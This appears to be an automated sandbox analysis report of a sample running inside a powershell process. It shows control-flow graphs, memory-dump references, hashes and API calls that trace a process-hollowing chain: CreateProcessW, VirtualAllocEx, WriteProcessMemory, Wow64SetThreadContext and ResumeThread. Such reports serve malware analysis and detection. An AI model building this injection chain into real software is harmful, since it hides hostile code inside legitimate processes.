                                                                                                            execution_graph 10812 2e181a7 10813 2e1817e 10812->10813 10814 2e18264 10813->10814 10817 2e1bd2f 10813->10817 10815 2e182f2 10818 2e1bd48 10817->10818 10821 2e1bd6e 10817->10821 10818->10821 10843 2e1bd2f 8 API calls 10818->10843 10844 2e1bdd0 10818->10844 10819 2e1bd7c 10819->10815 10820 2e1cb05 CreateProcessW 10823 2e1cb79 10820->10823 10821->10819 10827 2e1c6c3 10821->10827 10867 2e175a4 10821->10867 10824 2e1bf59 10825 2e175b0 Wow64SetThreadContext 10824->10825 10824->10827 10826 2e1c03a 10825->10826 10826->10827 10828 2e1c1dc VirtualAllocEx 10826->10828 10835 2e1c6de 10826->10835 10827->10820 10827->10835 10829 2e1c225 10828->10829 10829->10827 10831 2e1c2d2 VirtualAllocEx 10829->10831 10832 2e1c319 10829->10832 10830 2e175c8 WriteProcessMemory 10833 2e1c363 10830->10833 10831->10832 10832->10827 10832->10830 10832->10835 10833->10827 10834 2e1c56f 10833->10834 10833->10835 10840 2e175c8 WriteProcessMemory 10833->10840 10834->10827 10836 2e175c8 WriteProcessMemory 10834->10836 10835->10815 10837 2e1c5b7 10836->10837 10837->10827 10837->10835 10838 2e175d4 Wow64SetThreadContext 10837->10838 10839 2e1c66e 10838->10839 10839->10827 10839->10835 10841 2e1c683 ResumeThread 10839->10841 10840->10833 10841->10827 10843->10818 10846 2e1be52 10844->10846 10845 2e1cb05 CreateProcessW 10848 2e1cb79 10845->10848 10847 2e175a4 CreateProcessW 10846->10847 10852 2e1c6c3 10846->10852 10849 2e1bf59 10847->10849 10849->10852 10871 2e175b0 10849->10871 10851 2e1c03a 10851->10852 10853 2e1c1dc VirtualAllocEx 10851->10853 10860 2e1c6de 10851->10860 10852->10845 10852->10860 10854 2e1c225 10853->10854 10854->10852 10856 2e1c2d2 VirtualAllocEx 10854->10856 10857 2e1c319 10854->10857 10856->10857 10857->10852 10857->10860 10875 2e175c8 10857->10875 10858 2e1c363 10858->10852 10859 2e1c56f 10858->10859 10858->10860 10865 2e175c8 WriteProcessMemory 10858->10865 10859->10852 10861 2e175c8 WriteProcessMemory 10859->10861 10860->10818 10862 2e1c5b7 10861->10862 10862->10852 10862->10860 10879 2e175d4 10862->10879 10865->10858 10866 2e1c683 ResumeThread 10866->10852 10868 2e1ca20 CreateProcessW 10867->10868 10870 2e1cb79 10868->10870 10872 2e1cc60 Wow64SetThreadContext 10871->10872 10874 2e1ccda 10872->10874 10874->10851 10876 2e1d1d8 WriteProcessMemory 10875->10876 10878 2e1d263 10876->10878 10878->10858 10880 2e1cc60 Wow64SetThreadContext 10879->10880 10882 2e1c66e 10880->10882 10882->10852 10882->10860 10882->10866

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 677 2e17638-2e1766d 679 2e17676 677->679 680 2e1766f-2e17674 677->680 681 2e1767d-2e17681 679->681 680->681 682 2e17693-2e176ac 681->682 683 2e17683-2e17691 681->683 689 2e176b7-2e176b9 682->689 690 2e176ae-2e176b5 682->690 686 2e176cc-2e176e9 683->686 694 2e176f2 686->694 695 2e176eb-2e176f0 686->695 691 2e176bc-2e176c0 689->691 690->691 691->686 693 2e176c2-2e176c9 691->693 693->686 696 2e176f9-2e176fd 694->696 695->696 697 2e17703-2e17af4 call 2e172a4 call 2e172b4 call 2e172c4 696->697 698 2e17c8c-2e17ca9 696->698 902 2e17b11-2e17b1f 697->902 903 2e17af6-2e17b0f 697->903 705 2e17cbb 698->705 706 2e17cab-2e17cb0 698->706 708 2e17cc2-2e17cc6 705->708 706->708 709 2e17ccc-2e17d09 708->709 710 2e1817e-2e1819e 708->710 730 2e17d12 709->730 731 2e17d0b-2e17d10 709->731 718 2e181b0 710->718 719 2e181a0-2e181a5 710->719 720 2e181b7-2e181bb 718->720 719->720 723 2e181c9-2e18214 call 2e13824 call 2e16614 720->723 724 2e181bd-2e181c0 720->724 765 2e18219-2e18220 call 2e16624 723->765 724->723 733 2e17d19-2e17d1d 730->733 731->733 736 2e17d23-2e17eb3 call 2e16604 733->736 737 2e17eb8-2e180c2 call 2e172a4 call 2e172b4 call 2e172c4 733->737 736->737 863 2e180e5-2e180f9 737->863 864 2e180c4-2e180e3 737->864 770 2e18225-2e1824e 765->770 783 2e18250-2e18255 770->783 784 2e18257 770->784 787 2e1825e-2e18262 783->787 784->787 789 2e182b0-2e182e1 787->789 790 2e18264-2e182ad 787->790 809 2e182e8-2e182ec call 2e1bd2f 789->809 815 2e182f2-2e182f9 809->815 866 2e180ff-2e18118 863->866 864->866 867 2e18126-2e18153 866->867 868 2e1811a-2e18120 866->868 873 2e18155-2e1815d 867->873 874 2e1815f 867->874 868->867 876 2e18169-2e18170 873->876 874->876 877 2e18172 876->877 878 2e1817b 876->878 877->878 878->710 904 2e17b25-2e17b3b 902->904 903->904 905 2e17b3d-2e17b49 904->905 906 2e17b4f-2e17c61 904->906 905->906 924 2e17c63-2e17c6b 906->924 925 2e17c6d 906->925 926 2e17c77-2e17c7e 924->926 925->926 927 2e17c80 926->927 928 2e17c89-2e17c8a 926->928 927->928 928->698
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cba0ff182e916fcaee8fdb7211ec4d11f0a8c9a94694e3c942901879e382a5db
                                                                                                            • Instruction ID: e6ff7a578d45dc06c20536d94406a362b5ef7ea4df1b0a1f0e23d0032904ad06
                                                                                                            • Opcode Fuzzy Hash: cba0ff182e916fcaee8fdb7211ec4d11f0a8c9a94694e3c942901879e382a5db
                                                                                                            • Instruction Fuzzy Hash: 46721934A00259CFDB58DFA9D8587ADBBB3EB88305F148069EA0A97391DF344D85CF91
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,00000000,?,?), ref: 02E1C20C
                                                                                                            • VirtualAllocEx.KERNEL32(?,?,00000000,?,?), ref: 02E1C300
                                                                                                              • Part of subcall function 02E175C8: WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A86789D,00000000,?,?,?,197E608C,00000000,?,02E1C363,?,00000000,?), ref: 02E1D254
                                                                                                            • ResumeThread.KERNELBASE(?), ref: 02E1C6AA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual$MemoryProcessResumeThreadWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 2390764575-0
                                                                                                            • Opcode ID: 9c4bb74671837de478ea4849d1d217feef75caf075b320d0f83d002ea836344f
                                                                                                            • Instruction ID: a59871f9d0260c0a42da0a62452b4af73f2041c6a1b87601c245c9d1238044f6
                                                                                                            • Opcode Fuzzy Hash: 9c4bb74671837de478ea4849d1d217feef75caf075b320d0f83d002ea836344f
                                                                                                            • Instruction Fuzzy Hash: 58822B70A80359CFDB64CF64D944BAAB7F2BF44308F24E4AAD45AA7250DB70AD80CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 129cef5f1f2c2d7f5f8ab16924458b1c0c07bef897576280d82d28f606b4386e
                                                                                                            • Instruction ID: 9024793cfa94c378ab22210b112a07ca7a7b9e537ad3a75b69a39171789756d1
                                                                                                            • Opcode Fuzzy Hash: 129cef5f1f2c2d7f5f8ab16924458b1c0c07bef897576280d82d28f606b4386e
                                                                                                            • Instruction Fuzzy Hash: 74424E74A80355CFDB30CF64D944BAAB7F1BB44318F24E5AAE49997245DB30E980CF51

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 538 2e175a4-2e1ca99 540 2e1caa1-2e1caa8 538->540 541 2e1ca9b-2e1ca9e 538->541 542 2e1cab3-2e1cac9 540->542 543 2e1caaa-2e1cab0 540->543 541->540 544 2e1cad4-2e1cb77 CreateProcessW 542->544 545 2e1cacb-2e1cad1 542->545 543->542 547 2e1cb80-2e1cbf8 544->547 548 2e1cb79-2e1cb7f 544->548 545->544 555 2e1cc0a-2e1cc11 547->555 556 2e1cbfa-2e1cc00 547->556 548->547 557 2e1cc13-2e1cc22 555->557 558 2e1cc28 555->558 556->555 557->558 560 2e1cc29 558->560 560->560
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 02E1CB64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 9086fc4163cc5d4fba9cd8e259ffc5c2af8ac72959bd0375c27ad5f2b0aeb059
                                                                                                            • Instruction ID: a9c792143a481f798872f821face89d73d34696841b84b9d97dad892ad1c3be0
                                                                                                            • Opcode Fuzzy Hash: 9086fc4163cc5d4fba9cd8e259ffc5c2af8ac72959bd0375c27ad5f2b0aeb059
                                                                                                            • Instruction Fuzzy Hash: 9A513871941229DFEF20CF99C940BDEBBB5BF48304F1085AAE909B7250DB759A84CF60

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 561 2e1ca1f-2e1ca99 563 2e1caa1-2e1caa8 561->563 564 2e1ca9b-2e1ca9e 561->564 565 2e1cab3-2e1cac9 563->565 566 2e1caaa-2e1cab0 563->566 564->563 567 2e1cad4-2e1cb77 CreateProcessW 565->567 568 2e1cacb-2e1cad1 565->568 566->565 570 2e1cb80-2e1cbf8 567->570 571 2e1cb79-2e1cb7f 567->571 568->567 578 2e1cc0a-2e1cc11 570->578 579 2e1cbfa-2e1cc00 570->579 571->570 580 2e1cc13-2e1cc22 578->580 581 2e1cc28 578->581 579->578 580->581 583 2e1cc29 581->583 583->583
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 02E1CB64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 262d697f80bc90cc490151c83a0bf86b2b46ddde3243056b7096466e69fabc82
                                                                                                            • Instruction ID: c16c2ed68644be0f37504456e3534463b6beb1b7b0f78548d0ab91dfa44de114
                                                                                                            • Opcode Fuzzy Hash: 262d697f80bc90cc490151c83a0bf86b2b46ddde3243056b7096466e69fabc82
                                                                                                            • Instruction Fuzzy Hash: F8512871941229DFEF24CF99C940BDEBBB5BF48304F1085AAE909B7250DB759A84CF60

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 584 2e175c8-2e1d21e 586 2e1d220-2e1d226 584->586 587 2e1d228-2e1d261 WriteProcessMemory 584->587 586->587 588 2e1d263-2e1d269 587->588 589 2e1d26a-2e1d28b 587->589 588->589
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A86789D,00000000,?,?,?,197E608C,00000000,?,02E1C363,?,00000000,?), ref: 02E1D254
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 5c13818c2e62af47f093cf6d35b829a2cc5d335ae1bdbc66488a2107fea71ba5
                                                                                                            • Instruction ID: 31532b47482f413ca41df2800958dc3707e4b7716a50222f24b39e206591ff02
                                                                                                            • Opcode Fuzzy Hash: 5c13818c2e62af47f093cf6d35b829a2cc5d335ae1bdbc66488a2107fea71ba5
                                                                                                            • Instruction Fuzzy Hash: A921E4B5900319DFDB10CF9AD984BDEBBF4FB48324F10842AE958A7240D378A944CBA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 591 2e1d1d7-2e1d21e 593 2e1d220-2e1d226 591->593 594 2e1d228-2e1d261 WriteProcessMemory 591->594 593->594 595 2e1d263-2e1d269 594->595 596 2e1d26a-2e1d28b 594->596 595->596
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A86789D,00000000,?,?,?,197E608C,00000000,?,02E1C363,?,00000000,?), ref: 02E1D254
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 4e00ad7d7961a72de844ae71bedc90e78ba33a9f876f60a15e4070293e51208b
                                                                                                            • Instruction ID: 8bfe64e3480ed91ac0698a8035699f32e8f7ffa2b787c66be595de4d42f321ed
                                                                                                            • Opcode Fuzzy Hash: 4e00ad7d7961a72de844ae71bedc90e78ba33a9f876f60a15e4070293e51208b
                                                                                                            • Instruction Fuzzy Hash: B921E4B59013199FDB10CF9AD985BDEBBF8FB48324F10842AE918A7240D378A544CBA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 605 2e175d4-2e1cca0 607 2e1cca2-2e1ccaa 605->607 608 2e1ccac-2e1ccd8 Wow64SetThreadContext 605->608 607->608 609 2e1cce1-2e1cd02 608->609 610 2e1ccda-2e1cce0 608->610 610->609
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,197E608C,?,?,02E1C03A), ref: 02E1CCCB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 9ed12ccd4b25e0e715bf8f7153d534da97cdd07c6391a01fe1acf498db188266
                                                                                                            • Instruction ID: a73a22fcdebbcc7020d32e851768b3b723bc008496bb2db01b785c34dd3cb539
                                                                                                            • Opcode Fuzzy Hash: 9ed12ccd4b25e0e715bf8f7153d534da97cdd07c6391a01fe1acf498db188266
                                                                                                            • Instruction Fuzzy Hash: 4E1126B29006098FDB10CF9AC944BDEBBF4EB88224F24942AD458A3310D778A944CFA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 598 2e175b0-2e1cca0 600 2e1cca2-2e1ccaa 598->600 601 2e1ccac-2e1ccd8 Wow64SetThreadContext 598->601 600->601 602 2e1cce1-2e1cd02 601->602 603 2e1ccda-2e1cce0 601->603 603->602
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,197E608C,?,?,02E1C03A), ref: 02E1CCCB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 9632ce49703b480bf4385f5c459f7df523109a861def7918098aa1b26781bd7d
                                                                                                            • Instruction ID: 064405b5ba4c25ad1850442514fd4c66dadbdcb8413216d0ded61827e49032d4
                                                                                                            • Opcode Fuzzy Hash: 9632ce49703b480bf4385f5c459f7df523109a861def7918098aa1b26781bd7d
                                                                                                            • Instruction Fuzzy Hash: EA1126B29006498FDB10CF9AC944BDEBBF4EB88224F24946AD458E3310D778A945CFA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 612 2e1cc5f-2e1cca0 614 2e1cca2-2e1ccaa 612->614 615 2e1ccac-2e1ccd8 Wow64SetThreadContext 612->615 614->615 616 2e1cce1-2e1cd02 615->616 617 2e1ccda-2e1cce0 615->617 617->616
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,197E608C,?,?,02E1C03A), ref: 02E1CCCB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 2269544ed7f1793bb74c6806133692a528fd7038e8b995c2f93d9aed8527e048
                                                                                                            • Instruction ID: 31412342017559adcb97d10f91aa496cfbe68fc204569c97e385cffba27f298b
                                                                                                            • Opcode Fuzzy Hash: 2269544ed7f1793bb74c6806133692a528fd7038e8b995c2f93d9aed8527e048
                                                                                                            • Instruction Fuzzy Hash: D01137B2D002098FDB10CF9AC944BDEFBF4EB88224F14942AD418A3310D778A544CFA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1235 7381f18-7381f3a 1237 7381f40-7381f45 1235->1237 1238 73820b7-73820de 1235->1238 1239 7381f5d-7381f69 1237->1239 1240 7381f47-7381f4d 1237->1240 1244 73820e0-73820e3 1238->1244 1245 73820e4-7382102 1238->1245 1250 7381f6f-7381f72 1239->1250 1251 7382062-738206c 1239->1251 1241 7381f4f 1240->1241 1242 7381f51-7381f5b 1240->1242 1241->1239 1242->1239 1244->1245 1248 7382108-738210d 1245->1248 1249 738225d-7382278 1245->1249 1254 738210f-7382115 1248->1254 1255 7382125-7382129 1248->1255 1267 738227a-738227e 1249->1267 1268 7382214-738221d 1249->1268 1250->1251 1256 7381f78-7381f7f 1250->1256 1252 738207a-7382080 1251->1252 1253 738206e-7382077 1251->1253 1258 7382082-7382084 1252->1258 1259 7382086-7382092 1252->1259 1260 7382119-7382123 1254->1260 1261 7382117 1254->1261 1263 7382208-7382212 1255->1263 1264 738212f-7382133 1255->1264 1256->1238 1262 7381f85-7381f8a 1256->1262 1270 7382094-73820b4 1258->1270 1259->1270 1260->1255 1261->1255 1271 7381f8c-7381f92 1262->1271 1272 7381fa2-7381fa6 1262->1272 1263->1268 1269 7382220-7382226 1263->1269 1265 7382173 1264->1265 1266 7382135-7382146 1264->1266 1278 7382175-7382177 1265->1278 1266->1249 1292 738214c-7382151 1266->1292 1274 7382280-7382283 1267->1274 1275 7382284-73822a2 1267->1275 1276 7382228-738222a 1269->1276 1277 738222c-7382238 1269->1277 1281 7381f94 1271->1281 1282 7381f96-7381fa0 1271->1282 1272->1251 1273 7381fac-7381fb0 1272->1273 1285 7381fd0 1273->1285 1286 7381fb2-7381fce 1273->1286 1274->1275 1287 73822a8-73822ad 1275->1287 1288 738244c-738246e 1275->1288 1289 738223a-738225a 1276->1289 1277->1289 1278->1263 1290 738217d-7382181 1278->1290 1281->1272 1282->1272 1295 7381fd2-7381fd4 1285->1295 1286->1295 1293 73822af-73822b5 1287->1293 1294 73822c5-73822c9 1287->1294 1315 7382470-7382473 1288->1315 1316 7382474-738247c 1288->1316 1290->1263 1297 7382187-7382196 1290->1297 1299 7382169-7382171 1292->1299 1300 7382153-7382159 1292->1300 1302 73822b9-73822c3 1293->1302 1303 73822b7 1293->1303 1306 73822cf-73822d3 1294->1306 1307 73823f4-73823fe 1294->1307 1295->1251 1304 7381fda-7381fe7 1295->1304 1318 7382198-738219e 1297->1318 1319 73821ae-7382205 1297->1319 1299->1278 1313 738215b 1300->1313 1314 738215d-7382167 1300->1314 1302->1294 1303->1294 1341 7381fee-7381ff0 1304->1341 1309 7382313 1306->1309 1310 73822d5-73822e6 1306->1310 1311 738240c-7382412 1307->1311 1312 7382400-7382409 1307->1312 1323 7382315-7382317 1309->1323 1310->1288 1338 73822ec-73822f1 1310->1338 1320 7382418-7382424 1311->1320 1321 7382414-7382416 1311->1321 1313->1299 1314->1299 1315->1316 1325 738247e-738249b 1316->1325 1326 73824b5-73824bf 1316->1326 1329 73821a0 1318->1329 1330 73821a2-73821a4 1318->1330 1332 7382426-7382449 1320->1332 1321->1332 1323->1307 1334 738231d-7382321 1323->1334 1351 738249d-73824af 1325->1351 1352 7382505-738250a 1325->1352 1335 73824c8-73824ce 1326->1335 1336 73824c1-73824c5 1326->1336 1329->1319 1330->1319 1334->1307 1340 7382327-738232b 1334->1340 1343 73824d0-73824d2 1335->1343 1344 73824d4-73824e0 1335->1344 1345 7382309-7382311 1338->1345 1346 73822f3-73822f9 1338->1346 1340->1307 1348 7382331-7382357 1340->1348 1349 7382008-738205f 1341->1349 1350 7381ff2-7381ff8 1341->1350 1353 73824e2-7382502 1343->1353 1344->1353 1345->1323 1354 73822fb 1346->1354 1355 73822fd-7382307 1346->1355 1348->1307 1367 738235d-7382361 1348->1367 1356 7381ffa 1350->1356 1357 7381ffc-7381ffe 1350->1357 1351->1326 1352->1351 1354->1345 1355->1345 1356->1349 1357->1349 1368 7382363-738236c 1367->1368 1369 7382384 1367->1369 1370 738236e-7382371 1368->1370 1371 7382373-7382380 1368->1371 1372 7382387-7382394 1369->1372 1373 7382382 1370->1373 1371->1373 1375 738239a-73823f1 1372->1375 1373->1372
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2522270871.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_7380000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 196cc5168c6bf6bf8d2acf052e4d80a8ec6b2c6608b96719c0118540b8f48acf
                                                                                                            • Instruction ID: d192c75f1aaab32aa751e61353c192553972eebf7a020620d76bc742dc185721
                                                                                                            • Opcode Fuzzy Hash: 196cc5168c6bf6bf8d2acf052e4d80a8ec6b2c6608b96719c0118540b8f48acf
                                                                                                            • Instruction Fuzzy Hash: 07F117B0B0430ADFEB95AB79C81476BBBA6BFC5220F14C07AD55D8B251CB71C845C7A2

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1377 73809c8-73809eb 1378 73809f1-73809f6 1377->1378 1379 7380bc6-7380c0e 1377->1379 1380 73809f8-73809fe 1378->1380 1381 7380a0e-7380a12 1378->1381 1387 7380d7b-7380d9e 1379->1387 1388 7380c14-7380c19 1379->1388 1383 7380a00 1380->1383 1384 7380a02-7380a0c 1380->1384 1385 7380a18-7380a1c 1381->1385 1386 7380b73-7380b7d 1381->1386 1383->1381 1384->1381 1391 7380a1e-7380a2d 1385->1391 1392 7380a2f 1385->1392 1389 7380b8b-7380b91 1386->1389 1390 7380b7f-7380b88 1386->1390 1415 7380da0-7380da3 1387->1415 1416 7380da4-7380dad 1387->1416 1397 7380c1b-7380c21 1388->1397 1398 7380c31-7380c35 1388->1398 1395 7380b93-7380b95 1389->1395 1396 7380b97-7380ba3 1389->1396 1394 7380a31-7380a33 1391->1394 1392->1394 1394->1386 1403 7380a39-7380a59 1394->1403 1402 7380ba5-7380bc3 1395->1402 1396->1402 1404 7380c23 1397->1404 1405 7380c25-7380c2f 1397->1405 1399 7380d2a-7380d34 1398->1399 1400 7380c3b-7380c3d 1398->1400 1410 7380d42-7380d48 1399->1410 1411 7380d36-7380d3f 1399->1411 1407 7380c4d 1400->1407 1408 7380c3f-7380c4b 1400->1408 1430 7380a78 1403->1430 1431 7380a5b-7380a76 1403->1431 1404->1398 1405->1398 1413 7380c4f-7380c51 1407->1413 1408->1413 1417 7380d4a-7380d4c 1410->1417 1418 7380d4e-7380d5a 1410->1418 1413->1399 1420 7380c57-7380c59 1413->1420 1415->1416 1421 7380dbd 1416->1421 1422 7380daf-7380dbb 1416->1422 1423 7380d5c-7380d78 1417->1423 1418->1423 1425 7380c69 1420->1425 1426 7380c5b-7380c67 1420->1426 1428 7380dbf-7380dc1 1421->1428 1422->1428 1432 7380c6b-7380c6d 1425->1432 1426->1432 1433 7380e0d-7380e17 1428->1433 1434 7380dc3-7380dc9 1428->1434 1436 7380a7a-7380a7c 1430->1436 1431->1436 1432->1399 1439 7380c73-7380c75 1432->1439 1437 7380e19-7380e1f 1433->1437 1438 7380e22-7380e28 1433->1438 1440 7380dcb-7380dcd 1434->1440 1441 7380dd7-7380df4 1434->1441 1436->1386 1448 7380a82-7380a84 1436->1448 1443 7380e2a-7380e2c 1438->1443 1444 7380e2e-7380e3a 1438->1444 1446 7380c8f-7380c93 1439->1446 1447 7380c77-7380c7d 1439->1447 1440->1441 1457 7380e5a-7380e5f 1441->1457 1458 7380df6-7380e07 1441->1458 1450 7380e3c-7380e57 1443->1450 1444->1450 1453 7380cad-7380d27 1446->1453 1454 7380c95-7380c9b 1446->1454 1451 7380c7f 1447->1451 1452 7380c81-7380c8d 1447->1452 1455 7380a94 1448->1455 1456 7380a86-7380a92 1448->1456 1451->1446 1452->1446 1462 7380c9d 1454->1462 1463 7380c9f-7380cab 1454->1463 1459 7380a96-7380a98 1455->1459 1456->1459 1457->1458 1458->1433 1459->1386 1466 7380a9e-7380abe 1459->1466 1462->1453 1463->1453 1475 7380ac0-7380ac6 1466->1475 1476 7380ad6-7380ada 1466->1476 1477 7380ac8 1475->1477 1478 7380aca-7380acc 1475->1478 1479 7380adc-7380ae2 1476->1479 1480 7380af4-7380af8 1476->1480 1477->1476 1478->1476 1481 7380ae4 1479->1481 1482 7380ae6-7380af2 1479->1482 1483 7380aff-7380b01 1480->1483 1481->1480 1482->1480 1485 7380b19-7380b70 1483->1485 1486 7380b03-7380b09 1483->1486 1487 7380b0b 1486->1487 1488 7380b0d-7380b0f 1486->1488 1487->1485 1488->1485
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2522270871.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_7380000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c911a2f4ecf00404920373ef7290a3e883616371c63548375e6e2f3fc2859993
                                                                                                            • Instruction ID: 36d36afe2dc7663b8ec78c395f77963a40e6bb3618487b74402d5e414b8f005e
                                                                                                            • Opcode Fuzzy Hash: c911a2f4ecf00404920373ef7290a3e883616371c63548375e6e2f3fc2859993
                                                                                                            • Instruction Fuzzy Hash: 85C12AB1700306DFFBA9AB79880076ABBA5AFC1214F24807BD549CB782DB35D849C761

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
